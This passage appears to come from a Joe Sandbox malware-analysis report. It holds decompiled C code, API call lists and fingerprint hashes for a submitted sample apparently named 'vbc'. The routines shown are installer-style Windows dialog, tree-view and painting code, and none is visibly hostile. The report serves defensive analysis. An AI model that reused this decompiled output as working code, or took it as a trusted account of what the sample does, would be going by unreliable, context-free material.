                                                									_t293 = E004012E2( *0x42d260);
                                                									E00401299(_t293);
                                                									_t222 = 0;
                                                									_t301 = 0;
                                                									if(_t293 <= 0) {
                                                										L74:
                                                										SendMessageW(_v12, 0x14e, _t301, 0);
                                                										_a16 = _t293;
                                                										_a8 = 0x420;
                                                										goto L75;
                                                									} else {
                                                										goto L71;
                                                									}
                                                									do {
                                                										L71:
                                                										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                											_t301 = _t301 + 1;
                                                										}
                                                										_t222 = _t222 + 1;
                                                									} while (_t222 < _t293);
                                                									goto L74;
                                                								}
                                                							}
                                                						}
                                                						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                							goto L93;
                                                						} else {
                                                							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                							if(_t232 == 0xffffffff) {
                                                								goto L93;
                                                							}
                                                							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                								_t294 = 0x20;
                                                							}
                                                							E00401299(_t294);
                                                							SendMessageW(_a4, 0x420, 0, _t294);
                                                							_a12 = _a12 | 0xffffffff;
                                                							_a16 = 0;
                                                							_a8 = 0x40f;
                                                							goto L56;
                                                						}
                                                					}
                                                				} else {
                                                					_v36 = 0;
                                                					_v20 = 2;
                                                					 *0x434f60 = _t291;
                                                					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                                					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                                                					 *0x42d254 =  *0x42d254 | 0xffffffff;
                                                					_t297 = _t258;
                                                					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                                                					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                					 *0x42d24c = _t260;
                                                					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                                                					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                					}
                                                					DeleteObject(_t297);
                                                					_t298 = 0;
                                                					do {
                                                						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                							if(_t298 != 0x20) {
                                                								_v20 = 0;
                                                							}
                                                							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                                                						}
                                                						_t298 = _t298 + 1;
                                                					} while (_t298 < 0x21);
                                                					_t299 = _a16;
                                                					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                					_push(0x15);
                                                					E00404499(_a4);
                                                					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                					_push(0x16);
                                                					E00404499(_a4);
                                                					_t300 = 0;
                                                					_v16 = 0;
                                                					if( *0x434f2c <= 0) {
                                                						L19:
                                                						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                						goto L20;
                                                					} else {
                                                						_t319 = _v24 + 8;
                                                						_v32 = _t319;
                                                						do {
                                                							_t278 =  &(_t319[0x10]);
                                                							if( *_t278 != 0) {
                                                								_v64 = _t278;
                                                								_t279 =  *_t319;
                                                								_v88 = _v16;
                                                								_t311 = 0x20;
                                                								_v84 = 0xffff0002;
                                                								_v80 = 0xd;
                                                								_v68 = _t311;
                                                								_v44 = _t300;
                                                								_v72 = _t279 & _t311;
                                                								if((_t279 & 0x00000002) == 0) {
                                                									if((_t279 & 0x00000004) == 0) {
                                                										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                									} else {
                                                										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                									}
                                                								} else {
                                                									_v80 = 0x4d;
                                                									_v48 = 1;
                                                									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                									_v36 = 1;
                                                									 *( *0x42d260 + _t300 * 4) = _t284;
                                                									_v16 =  *( *0x42d260 + _t300 * 4);
                                                								}
                                                							}
                                                							_t300 = _t300 + 1;
                                                							_t319 =  &(_v32[0x818]);
                                                							_v32 = _t319;
                                                						} while (_t300 <  *0x434f2c);
                                                						if(_v36 != 0) {
                                                							L20:
                                                							if(_v20 != 0) {
                                                								E004044CE(_v8);
                                                								goto L23;
                                                							} else {
                                                								ShowWindow(_v12, 5);
                                                								E004044CE(_v12);
                                                								L93:
                                                								return E00404500(_a8, _a12, _a16);
                                                							}
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                			}


























































                                                0x00404f0d
                                                0x00404f26
                                                0x00404f2b
                                                0x00404f33
                                                0x00404f39
                                                0x00404f4f
                                                0x00404f52
                                                0x0040517d
                                                0x00405184
                                                0x00405198
                                                0x00405186
                                                0x00405188
                                                0x0040518b
                                                0x0040518c
                                                0x00405193
                                                0x00405193
                                                0x004051a4
                                                0x004051b2
                                                0x004051b5
                                                0x004051cb
                                                0x00405240
                                                0x00405243
                                                0x00405245
                                                0x0040524f
                                                0x0040525d
                                                0x0040525d
                                                0x0040525f
                                                0x00405269
                                                0x0040526f
                                                0x00405272
                                                0x00405275
                                                0x00405290
                                                0x00405277
                                                0x00405281
                                                0x00405281
                                                0x00405275
                                                0x00405269
                                                0x00000000
                                                0x00405243
                                                0x004051d0
                                                0x004051db
                                                0x004051e0
                                                0x004051e7
                                                0x004051ec
                                                0x004051f0
                                                0x004051fb
                                                0x004051fb
                                                0x004051ff
                                                0x00405203
                                                0x00405207
                                                0x0040521a
                                                0x00405209
                                                0x00405209
                                                0x00405210
                                                0x00405216
                                                0x00405212
                                                0x00405212
                                                0x00405212
                                                0x00405210
                                                0x0040521e
                                                0x00405220
                                                0x00405233
                                                0x00405236
                                                0x00405239
                                                0x00405239
                                                0x00405203
                                                0x00000000
                                                0x004051f0
                                                0x004051d2
                                                0x004051d9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405293
                                                0x00405293
                                                0x0040529a
                                                0x0040530b
                                                0x00405313
                                                0x0040531b
                                                0x0040531b
                                                0x00405324
                                                0x00405326
                                                0x0040532d
                                                0x00405330
                                                0x00405330
                                                0x00405336
                                                0x0040533d
                                                0x00405340
                                                0x00405340
                                                0x00405346
                                                0x0040534c
                                                0x00405352
                                                0x00405352
                                                0x0040535f
                                                0x004054c0
                                                0x004054c7
                                                0x004054e4
                                                0x004054ea
                                                0x004054fc
                                                0x004054fc
                                                0x00000000
                                                0x00405365
                                                0x00405367
                                                0x0040536c
                                                0x00405371
                                                0x00405376
                                                0x00405378
                                                0x00405378
                                                0x00405379
                                                0x0040537a
                                                0x0040537c
                                                0x0040537c
                                                0x00405384
                                                0x004053c5
                                                0x004053c7
                                                0x004053d7
                                                0x004053da
                                                0x004053df
                                                0x004053e6
                                                0x004053e9
                                                0x0040548b
                                                0x00405494
                                                0x0040549c
                                                0x0040549c
                                                0x004054aa
                                                0x004054bb
                                                0x004054bb
                                                0x00000000
                                                0x004054aa
                                                0x004053ef
                                                0x004053f2
                                                0x004053f8
                                                0x004053fd
                                                0x004053ff
                                                0x00405401
                                                0x00405407
                                                0x0040540e
                                                0x00405413
                                                0x0040541a
                                                0x0040541d
                                                0x0040541d
                                                0x00405424
                                                0x00405430
                                                0x00405434
                                                0x00405436
                                                0x00405436
                                                0x00405426
                                                0x00405428
                                                0x00405428
                                                0x00405456
                                                0x00405462
                                                0x00405471
                                                0x00405471
                                                0x00405473
                                                0x00405476
                                                0x0040547f
                                                0x00000000
                                                0x00405386
                                                0x00405391
                                                0x00405394
                                                0x00405399
                                                0x0040539b
                                                0x0040539f
                                                0x004053af
                                                0x004053b9
                                                0x004053bb
                                                0x004053be
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004053a1
                                                0x004053a1
                                                0x004053a7
                                                0x004053a9
                                                0x004053a9
                                                0x004053aa
                                                0x004053ab
                                                0x00000000
                                                0x004053a1
                                                0x00405384
                                                0x0040535f
                                                0x004052a2
                                                0x00000000
                                                0x004052b8
                                                0x004052c2
                                                0x004052c7
                                                0x00000000
                                                0x00000000
                                                0x004052d9
                                                0x004052de
                                                0x004052ea
                                                0x004052ea
                                                0x004052ec
                                                0x004052fb
                                                0x004052fd
                                                0x00405301
                                                0x00405304
                                                0x00000000
                                                0x00405304
                                                0x004052a2
                                                0x00404f58
                                                0x00404f5d
                                                0x00404f66
                                                0x00404f6d
                                                0x00404f7f
                                                0x00404f8a
                                                0x00404f90
                                                0x00404f9e
                                                0x00404fb2
                                                0x00404fb7
                                                0x00404fc4
                                                0x00404fc9
                                                0x00404fdf
                                                0x00404ff0
                                                0x00404ffd
                                                0x00404ffd
                                                0x00405000
                                                0x00405006
                                                0x00405008
                                                0x0040500b
                                                0x00405010
                                                0x00405015
                                                0x00405017
                                                0x00405017
                                                0x00405037
                                                0x00405037
                                                0x00405039
                                                0x0040503a
                                                0x0040503f
                                                0x00405045
                                                0x00405049
                                                0x0040504e
                                                0x00405056
                                                0x0040505a
                                                0x0040505f
                                                0x00405064
                                                0x0040506c
                                                0x0040506f
                                                0x0040513f
                                                0x00405152
                                                0x00000000
                                                0x00405075
                                                0x00405078
                                                0x0040507b
                                                0x0040507e
                                                0x0040507e
                                                0x00405084
                                                0x0040508d
                                                0x00405090
                                                0x00405094
                                                0x00405097
                                                0x0040509a
                                                0x004050a3
                                                0x004050ac
                                                0x004050af
                                                0x004050b2
                                                0x004050b5
                                                0x004050f3
                                                0x0040511e
                                                0x004050f5
                                                0x00405104
                                                0x00405104
                                                0x004050b7
                                                0x004050ba
                                                0x004050c8
                                                0x004050d2
                                                0x004050da
                                                0x004050e1
                                                0x004050ec
                                                0x004050ec
                                                0x004050b5
                                                0x00405124
                                                0x00405125
                                                0x00405131
                                                0x00405131
                                                0x0040513d
                                                0x00405158
                                                0x0040515b
                                                0x00405178
                                                0x00000000
                                                0x0040515d
                                                0x00405162
                                                0x0040516b
                                                0x004054fe
                                                0x00405510
                                                0x00405510
                                                0x0040515b
                                                0x00000000
                                                0x0040513d
                                                0x0040506f

                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                • LoadImageW.USER32 ref: 00404F8A
                                                • SetWindowLongW.USER32 ref: 00404FA3
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                • DeleteObject.GDI32(00000000), ref: 00405000
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                • SetWindowLongW.USER32 ref: 00405152
                                                • ShowWindow.USER32(?,00000005), ref: 00405162
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                • GlobalFree.KERNEL32(?), ref: 00405340
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                • ShowWindow.USER32(00000000), ref: 004054FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 2564846305-813528018
                                                • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				void* _v16;
                                                				struct HWND__* _t56;
                                                				intOrPtr _t69;
                                                				signed int _t75;
                                                				signed short* _t76;
                                                				signed short* _t78;
                                                				long _t92;
                                                				int _t103;
                                                				signed int _t110;
                                                				intOrPtr _t113;
                                                				WCHAR* _t114;
                                                				signed int* _t116;
                                                				WCHAR* _t117;
                                                				struct HWND__* _t118;
                                                
                                                				if(_a8 != 0x110) {
                                                					if(_a8 != 0x111) {
                                                						L13:
                                                						if(_a8 != 0x4e) {
                                                							if(_a8 == 0x40b) {
                                                								 *0x42b234 =  *0x42b234 + 1;
                                                							}
                                                							L27:
                                                							_t114 = _a16;
                                                							L28:
                                                							return E00404500(_a8, _a12, _t114);
                                                						}
                                                						_t56 = GetDlgItem(_a4, 0x3e8);
                                                						_t114 = _a16;
                                                						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                							_v12 = _t103;
                                                							_v16 = _t113;
                                                							_v8 = 0x432ea0;
                                                							if(_t103 - _t113 < 0x800) {
                                                								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                								SetCursor(LoadCursorW(0, 0x7f02));
                                                								_push(1);
                                                								E00404907(_a4, _v8);
                                                								SetCursor(LoadCursorW(0, 0x7f00));
                                                								_t114 = _a16;
                                                							}
                                                						}
                                                						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                							goto L28;
                                                						} else {
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                								SendMessageW( *0x434f08, 0x111, 1, 0);
                                                							}
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                								SendMessageW( *0x434f08, 0x10, 0, 0);
                                                							}
                                                							return 1;
                                                						}
                                                					}
                                                					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                                                						goto L27;
                                                					} else {
                                                						_t69 =  *0x42c240; // 0x900bec
                                                						_t29 = _t69 + 0x14; // 0x900c00
                                                						_t116 = _t29;
                                                						if(( *_t116 & 0x00000020) == 0) {
                                                							goto L27;
                                                						}
                                                						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                						E004048E3();
                                                						goto L13;
                                                					}
                                                				}
                                                				_t117 = _a16;
                                                				_t75 =  *(_t117 + 0x30);
                                                				if(_t75 < 0) {
                                                					_t75 =  *( *0x433edc - 4 + _t75 * 4);
                                                				}
                                                				_t76 =  *0x434f38 + _t75 * 2;
                                                				_t110 =  *_t76 & 0x0000ffff;
                                                				_a8 = _t110;
                                                				_t78 =  &(_t76[1]);
                                                				_a16 = _t78;
                                                				_v16 = _t78;
                                                				_v12 = 0;
                                                				_v8 = E00404609;
                                                				if(_t110 != 2) {
                                                					_v8 = E004045CF;
                                                				}
                                                				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                				_push(0x22);
                                                				E00404499(_a4);
                                                				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                				_push(0x23);
                                                				E00404499(_a4);
                                                				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                				_t118 = GetDlgItem(_a4, 0x3e8);
                                                				E004044CE(_t118);
                                                				SendMessageW(_t118, 0x45b, 1, 0);
                                                				_t92 =  *( *0x434f10 + 0x68);
                                                				if(_t92 < 0) {
                                                					_t92 = GetSysColor( ~_t92);
                                                				}
                                                				SendMessageW(_t118, 0x443, 0, _t92);
                                                				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                				 *0x42b234 = 0;
                                                				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                				 *0x42b234 = 0;
                                                				return 0;
                                                			}



















                                                0x0040466a
                                                0x00404797
                                                0x004047f4
                                                0x004047f8
                                                0x004048c5
                                                0x004048c7
                                                0x004048c7
                                                0x004048cd
                                                0x004048cd
                                                0x004048d0
                                                0x00000000
                                                0x004048d7
                                                0x00404806
                                                0x0040480c
                                                0x00404816
                                                0x00404821
                                                0x00404824
                                                0x00404827
                                                0x00404832
                                                0x00404835
                                                0x0040483c
                                                0x00404849
                                                0x0040485a
                                                0x00404860
                                                0x00404868
                                                0x00404876
                                                0x0040487c
                                                0x0040487c
                                                0x0040483c
                                                0x00404886
                                                0x00000000
                                                0x00404891
                                                0x00404895
                                                0x004048a5
                                                0x004048a5
                                                0x004048ab
                                                0x004048b7
                                                0x004048b7
                                                0x00000000
                                                0x004048bb
                                                0x00404886
                                                0x004047a2
                                                0x00000000
                                                0x004047b4
                                                0x004047b4
                                                0x004047b9
                                                0x004047b9
                                                0x004047bf
                                                0x00000000
                                                0x00000000
                                                0x004047e8
                                                0x004047ea
                                                0x004047ef
                                                0x00000000
                                                0x004047ef
                                                0x004047a2
                                                0x00404670
                                                0x00404673
                                                0x00404678
                                                0x00404689
                                                0x00404689
                                                0x00404691
                                                0x00404694
                                                0x00404698
                                                0x0040469b
                                                0x0040469f
                                                0x004046a2
                                                0x004046a5
                                                0x004046a8
                                                0x004046af
                                                0x004046b1
                                                0x004046b1
                                                0x004046bb
                                                0x004046c8
                                                0x004046d2
                                                0x004046d7
                                                0x004046da
                                                0x004046df
                                                0x004046f6
                                                0x004046fd
                                                0x00404710
                                                0x00404713
                                                0x00404727
                                                0x0040472e
                                                0x00404733
                                                0x00404738
                                                0x00404738
                                                0x00404746
                                                0x00404754
                                                0x00404766
                                                0x0040476b
                                                0x0040477b
                                                0x0040477d
                                                0x00000000

                                                APIs
                                                • CheckDlgButton.USER32 ref: 004046F6
                                                • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                • GetSysColor.USER32 ref: 00404738
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                • lstrlenW.KERNEL32(?), ref: 00404759
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                • SendMessageW.USER32(00000000), ref: 004047DB
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                • LoadCursorW.USER32 ref: 00404857
                                                • SetCursor.USER32(00000000), ref: 0040485A
                                                • LoadCursorW.USER32 ref: 00404873
                                                • SetCursor.USER32(00000000), ref: 00404876
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: Call$N
                                                • API String ID: 3103080414-3438112850
                                                • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                				struct tagLOGBRUSH _v16;
                                                				struct tagRECT _v32;
                                                				struct tagPAINTSTRUCT _v96;
                                                				struct HDC__* _t70;
                                                				struct HBRUSH__* _t87;
                                                				struct HFONT__* _t94;
                                                				long _t102;
                                                				signed int _t126;
                                                				struct HDC__* _t128;
                                                				intOrPtr _t130;
                                                
                                                				if(_a8 == 0xf) {
                                                					_t130 =  *0x434f10;
                                                					_t70 = BeginPaint(_a4,  &_v96);
                                                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                					_a8 = _t70;
                                                					GetClientRect(_a4,  &_v32);
                                                					_t126 = _v32.bottom;
                                                					_v32.bottom = _v32.bottom & 0x00000000;
                                                					while(_v32.top < _t126) {
                                                						_a12 = _t126 - _v32.top;
                                                						asm("cdq");
                                                						asm("cdq");
                                                						asm("cdq");
                                                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                						_t87 = CreateBrushIndirect( &_v16);
                                                						_v32.bottom = _v32.bottom + 4;
                                                						_a16 = _t87;
                                                						FillRect(_a8,  &_v32, _t87);
                                                						DeleteObject(_a16);
                                                						_v32.top = _v32.top + 4;
                                                					}
                                                					if( *(_t130 + 0x58) != 0xffffffff) {
                                                						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                						_a16 = _t94;
                                                						if(_t94 != 0) {
                                                							_t128 = _a8;
                                                							_v32.left = 0x10;
                                                							_v32.top = 8;
                                                							SetBkMode(_t128, 1);
                                                							SetTextColor(_t128,  *(_t130 + 0x58));
                                                							_a8 = SelectObject(_t128, _a16);
                                                							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                                                							SelectObject(_t128, _a8);
                                                							DeleteObject(_a16);
                                                						}
                                                					}
                                                					EndPaint(_a4,  &_v96);
                                                					return 0;
                                                				}
                                                				_t102 = _a16;
                                                				if(_a8 == 0x46) {
                                                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                                                				}
                                                				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                			}













                                                0x0040100a
                                                0x00401039
                                                0x00401047
                                                0x0040104d
                                                0x00401051
                                                0x0040105b
                                                0x00401061
                                                0x00401064
                                                0x004010f3
                                                0x00401089
                                                0x0040108c
                                                0x004010a6
                                                0x004010bd
                                                0x004010cc
                                                0x004010cf
                                                0x004010d5
                                                0x004010d9
                                                0x004010e4
                                                0x004010ed
                                                0x004010ef
                                                0x004010ef
                                                0x00401100
                                                0x00401105
                                                0x0040110d
                                                0x00401110
                                                0x00401112
                                                0x00401118
                                                0x0040111f
                                                0x00401126
                                                0x00401130
                                                0x00401142
                                                0x00401156
                                                0x00401160
                                                0x00401165
                                                0x00401165
                                                0x00401110
                                                0x0040116e
                                                0x00000000
                                                0x00401178
                                                0x00401010
                                                0x00401013
                                                0x00401015
                                                0x0040101f
                                                0x0040101f
                                                0x00000000

                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406183(void* __ecx) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				long _t12;
                                                				long _t24;
                                                				char* _t31;
                                                				int _t37;
                                                				void* _t38;
                                                				intOrPtr* _t39;
                                                				long _t42;
